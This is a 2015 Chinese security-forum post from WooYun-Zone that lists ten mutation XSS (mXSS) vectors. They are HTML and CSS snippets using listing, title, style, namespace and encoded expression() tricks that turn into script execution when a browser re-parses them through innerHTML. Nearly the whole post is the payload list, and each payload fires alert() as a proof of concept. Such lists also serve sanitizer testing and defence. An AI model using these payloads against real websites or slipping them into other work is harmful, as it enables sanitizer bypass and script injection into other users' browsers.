一些 mXSS Vector (WOOYUN)

  • A+
所属分类:WooYun-Zone

随随意意 (RedFreever007pyphrb的徒弟) 一些 mXSS Vector  (WOOYUN) | 2015-06-09 23:17

收集了蛮多的,扔10条出来,我好想当一条渗透狗远离XSS
<listing>&ltimg src=x onerror=alert(1)&gt</listing>

<img src="test.jpg" alt ="``onload=alert(2)" />

<script>
x="<%";
</script>
<div title="%&gt;&lt;/script&gt;&quot;&lt;img src=1 onerror=alert(3)&gt;"></div>

<style/>&lt;/style&gt;&lt;img src=1 onerror=alert(4)&gt;</style>

<listing id=x>&lt;img src=1 onerror=alert(5)&gt;</listing>
<script>alert(document.getElementById('x').innerHTML)</script>

<title>&lt;img src=1 onerror=alert(6)&gt;</title> div.innerHTML = document.getElementsByTagName("title")[0]; // IE8, already-known?

<pkav xmlns="urn:img src=1 onerror=alert(7)//">123

<pkav xmlns="><iframe onload=alert(8)">123</pkav>

<p style="font-family:'ar\27 \3bx\3a expression\28alert\28 9\29\29\3bial';"></p>

<p style="font-family:'ar&#x5c;27 \3bx\3a ex\5cpre\2f**\2fssion\28 alert\28 10\29\29\3bial';"></p>

分享到: